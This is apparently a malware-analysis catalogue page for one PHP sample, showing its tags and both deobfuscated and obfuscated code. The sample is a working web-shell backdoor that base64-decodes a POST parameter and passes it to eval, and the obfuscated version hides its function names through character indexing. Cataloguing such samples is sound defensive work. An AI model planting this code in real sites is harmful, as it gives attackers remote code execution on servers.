PHP Malware Analysis

Back to list

Tags

Encoding
base64_decode
Execution
eval
Input
_POST

Deobfuscated code

<?php

$mfpc56 = "6atc4d_poesb";
$jti9 = strtolower("base64_decode");
$wtlx07 = "_POST";
if (isset($_POST['nf03c87'])) {
    eval($jti9($_POST['nf03c87']));
}

Original code

<?php
$mfpc56 = "6atc4d_poesb";
$jti9 = strtolower($mfpc56[11] . $mfpc56[1] . $mfpc56[10] . $mfpc56[9] . $mfpc56[0] . $mfpc56[4] . $mfpc56[6] . $mfpc56[5] . $mfpc56[9] . $mfpc56[3] . $mfpc56[8] . $mfpc56[5] . $mfpc56[9]);
$wtlx07 = strtoupper($mfpc56[6] . $mfpc56[7] . $mfpc56[8] . $mfpc56[10] . $mfpc56[2]);
if (isset (${$wtlx07} ['nf03c87'])) {
    eval($jti9 (${$wtlx07}['nf03c87']));
}